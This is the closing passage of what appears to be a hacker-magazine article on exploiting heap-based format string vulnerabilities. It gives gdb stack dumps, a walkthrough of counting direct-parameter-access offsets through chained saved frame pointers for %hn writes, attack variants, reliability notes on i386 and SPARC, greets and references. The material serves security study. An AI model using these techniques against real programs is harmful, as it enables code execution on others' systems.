 0xdfbfdd08:     0xdfbfddf2      0x0000aabb     [0xdfbfdd30]--+ (0x00001968)
 0xdfbfdd18:     0x000020d4      0x0000ccdd      0x00000000   |  0x00001937
 0xdfbfdd28:     0x00000000      0x00000000   +-[0xdfbfdd6c]<-+  0x0000109c
 0xdfbfdd38:     0x00000001      0xdfbfdd74   |  0xdfbfdd7c      0x00002000
 0xdfbfdd48:     0x0000002f      0x00000000   |  0x00000000      0xdfbfdff0
 0xdfbfdd58:     0x00000000      0x0005a0c8   |  0x00000000      0x00000000
 0xdfbfdd68:     0x00002000     [0x00000000]<-+  0x00000001      0xdfbfddd4
 0xdfbfdd78:     0x00000000      0xdfbfddeb      0xdfbfde04      0xdfbfde0f
 0xdfbfdd88:     0xdfbfde50      0xdfbfde66      0xdfbfde7e      0xdfbfde9e

  Ok, time to start getting the right values. First, 0x1968 (from previous
 'bt' command) is where do_printf() will return after finishing, locate it
 in the stack (in this example it's at 0xdfbfdd14). The previous word is
 where Frame A starts, and is where Frame A's ebp is saved, here it's
 0xdfbfdd30.
  Great! now we need the direct parameter access number for it, so, as we
 executed up to the call, the first word in the stack is the first argument
 for printf(), numbered 0. If you count, starting from 0, up to Frame A's
 ebp, you'll count 6 words, that's the number we want.
  Now, locate where Frame A's ebp is pointing to, that's Frame B's ebp,
 here 0xdfbfdd6c. Count again, you'll get 14, 2nd value needed. Cool, now
 Frame B's saved ebp is ponting to Frame C's ebp, so, we already have
 another value: 0xdfbfdd6c. And to get the last number needed, you need to
 count again, until you get to Frame C's ebp (count until you get to the
 address 0xdfbfdd6c), you should get 29.

  Now edit your fs.c, compile it, gdb it, and run past the call (one more
 'ni'), you should see a lot of zeros and then:

 (gdb) x/x 0xdfbfddf0
 0xdfbfddf0:     0xaabbccdd

  Apparently it does work after all :-)

  There are some interesting variants. In this example, printf() is not
 called from main(), but from do_printf(). This is an artifact so we had 3
 frames to play with. If the printf() is directly in main(), you will not
 have three frames, but you could do just the same using argv and *argv, as
 the only real things you need are a pointer in the stack, pointing to
 another pointer in the stack pointing somewhere in the stack.

  Another interesting method (probably even more interesting than the
 original), is to target not a function pointer but a return address in
 stack.  This method will be a lot shorter (just 2 %hn per short to write,
 and only 2 frames needed), a lot of addresses could be bruteforced at the
 same time, and of course, you could use a jumpcode if you want.

  This time We'll leave the experimentation with this two variantes (and
 others) to the reader.

  It is noteworthy, that with this technique in i386, Frame B breaks the
 chain of the stack frames, so if the program you're exploiting needs to use
 Frame C, it's probably that it will segfault, hence you'll need to hook the
 execution flow before the crash.

 --[ 10. conclusions

 --[ 10.1. is it dangerous to overwrite the l0 (on the stack frame) ?

  This is not perfect, but practice shows that you will not have many
 problems in changing the value of l0. But, would you be unlucky, you may
 prefer to modify the l0's that belongs to main()'s and _start()'s stack
 frames.

 --[ 10.2. is it dangerous to overwrite the ebp (on the stack frame) ?

  Yes, it's very dangerous. Probably your program will crash. But as we
 saw, you can restore the original ebp value using the pointer generator :-)
 And as in the SPARC case, you may prefer to modify the ebp's that belongs
 to the main(), _start(), etc, stack frames.


 --[ 10.3. is this reliable ?

  If you know the state of the stack, or if you know the sizes of the stack
 frames, it is reliable. Otherwise, unless the situation lets you implement
 some smooth way of bruteforcing all the numbers needed, this technique
 won't help you much.

  I think when you have to overwrite values that are located in addresses
 that have zeros, this may be your only hope, since, you won't be able to
 put a zero in your format string (because it will truncate your string).

  Also in SPARC, the binaries' PLT are located in low addresses and it is
 more reliable to overwrite the binary's PLT than the libc's PLT. Why is
 this so? Because, I would guess, in Solaris libc changes more frequently
 than the binary that you want to exploit. And probably, the binary you want
 to exploit will never change! 

 --[ The End
 --[ 11. more greets and thanks

  gera:

    riq, for trying every stupid idea I have and making it real!

    juliano, for being our format strings guru.

    Impact, for forcing me to spend time thinking about all theese amazing
    things.

    last minute addition: I just learned of the existence of a library
    called fmtgen, Copyrighted by fish stiqz. It's a format string
    construction library, and it can be used (as suggested in its Readme),
    to write jumpcodes or even shellcodes as well as addresses. This are
    the last lines I'm adding to the article, I wish I had a little more
    time, to study it, but we are in a hurry, you know :-)
  riq:

    gera, for finding out how to exploit the heap based format strings in
    i386, for his ideas, suggestions and fixes.

    juliano, for letting me know that I can overwrite, as may times as I
    want an address using 'direct access', and other tips about format
    strings.

    javier, for helping me in SPARC.

    bombi, for trying her best to correct my English.

    and bruce, for correcting my English, too.

 --[ 12. references

 [1] Exploiting Format String Vulnerability, scut's. 
    March 2001. http://www.team-teso.net/articles/formatstring

 [2] w00w00 on Heap Overflows, Matt Conover (shok) and w00w00 Security Team.
    January 1999. http://www.w00w00.org/articles.html

 [3] Juliano's badc0ded
    http://community.corest.com/~juliano

 [4] Google the oracle.
    http://www.google.com

 |=[ EOF ]=---------------------------------------------------------------=|